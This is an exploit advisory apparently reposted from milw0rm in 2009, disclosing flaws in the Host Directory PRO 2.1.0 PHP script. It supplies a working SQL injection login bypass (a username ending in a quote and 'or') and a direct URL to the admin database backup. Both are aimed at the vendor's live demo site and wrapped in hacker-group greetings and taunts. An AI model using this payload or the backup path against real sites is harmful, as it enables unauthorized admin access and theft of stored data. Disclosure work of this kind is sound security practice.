Host Directory PRO 2.1.0 Remote Database Backup Vulnerability :

Date : 2009-06-04 Author : ZoRLu
[~] Host Directory Pro Bypass & Backup DB Disc. Multiple Vulns.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: [email protected]
[~]
[~] Date: 28/03/09
[~]
[~] Home: yildirimordulari.com / z0rlu.blogspot.com / www.experl.com / woltaj.org
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: New Target Buffer Overflow : ) there is a little time xD
[~]
[~] N0T: Unutulduk mu ?
[~] -----------------------------------------------------------

script:

http://www.phphostdirectoryscript.com/

Bypass for demo:

username: demo ' or '

pass: ZoRLu or dont write anything

http://demo-host-directory-pro.phphostdirectoryscript.com/

Backup DB Disc. for demo:

http://demo-host-directory-pro.phphostdirectoryscript.com/admin/backup/db

[~]----------------------------------------------------------------------
[~] Greetz tO: Cyber-Zone & Dr.Ly0N & w0cker
[~]
[~] yildirimordulari.com / z0rlu.blogspot.com / www.experl.com / woltaj.org
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-06-04]

C1

 

C2

 

C3